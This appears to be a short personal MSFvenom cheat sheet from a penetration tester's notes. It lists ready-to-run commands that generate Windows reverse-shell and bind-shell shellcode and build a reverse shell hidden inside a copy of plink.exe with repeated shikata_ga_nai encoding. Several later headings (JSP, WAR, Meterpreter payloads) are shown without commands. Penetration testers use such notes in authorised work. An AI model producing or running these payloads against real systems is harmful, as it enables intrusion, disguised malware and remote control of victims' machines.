MSFvenom Cheetsheet
My various MSFvenom commands to generate shellcode, reverse shells, and meterpreter payloads that I end up using over, and over, and over, and over...
Shellcode Generation
Generic Shellcode
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e generic/noneWindows Reverse TCP Shell (Shellcode x86)
`msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40"`Windows Reverse TCP Shell Embedded in `plink.exe`
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o burmat_embedded.exeBind Shell Shellcode
msfvenom -p windows/shell_bind_tcp RHOST=10.11.11.11 LPORT=1337 -b '\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40' -f pythonReverse Shells
JSP Reverse Shell
JavaScript Reverse Shells
WAR (Java) Reverse Shell
Meterpreter Payloads
Windows Meterpreter Payload
Windows Meterpreter Reverse HTTPS Payload (x86)
Linux Meterpreter Stager
Last updated